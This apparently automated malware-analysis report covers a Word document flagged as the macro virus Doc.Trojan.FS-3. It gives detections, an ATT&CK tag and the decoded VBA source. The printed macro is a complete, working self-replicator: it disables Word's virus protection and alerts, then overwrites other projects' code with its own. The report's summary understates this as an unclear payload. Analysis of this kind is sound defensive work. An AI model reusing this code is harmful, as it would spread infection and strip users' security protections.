MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file contains VBA macros that attempt to disable virus protection and other security alerts within Microsoft Word. The macro code is obfuscated and appears designed to prepare the document for further malicious actions, though the exact payload is not directly discernible from the provided script.
Heuristics 2
-
ClamAV: Doc.Trojan.FS-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.FS-3
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 831 bytes |
SHA-256: 30345b141d52a24e3fed9df520d5264279f9df934242b5e31ae2632d69b37916 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Copyright (C) 1998 by FlyShadow ~^^~ - 17th Private Sub Document_Close() On Error Resume Next Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 Application.DisplayAlerts = 0 Application.ScreenUpdating = 0 Application.EnableCancelKey = 0 For Each α In VBE.VBProjects If α.Protection <> 1 And α.Description <> "17th" Then α.Description = "17th" With α.VBComponents(1).CodeModule .DeleteLines 1, .CountOfLines .AddFromString ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 17) End With: End If: Next End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.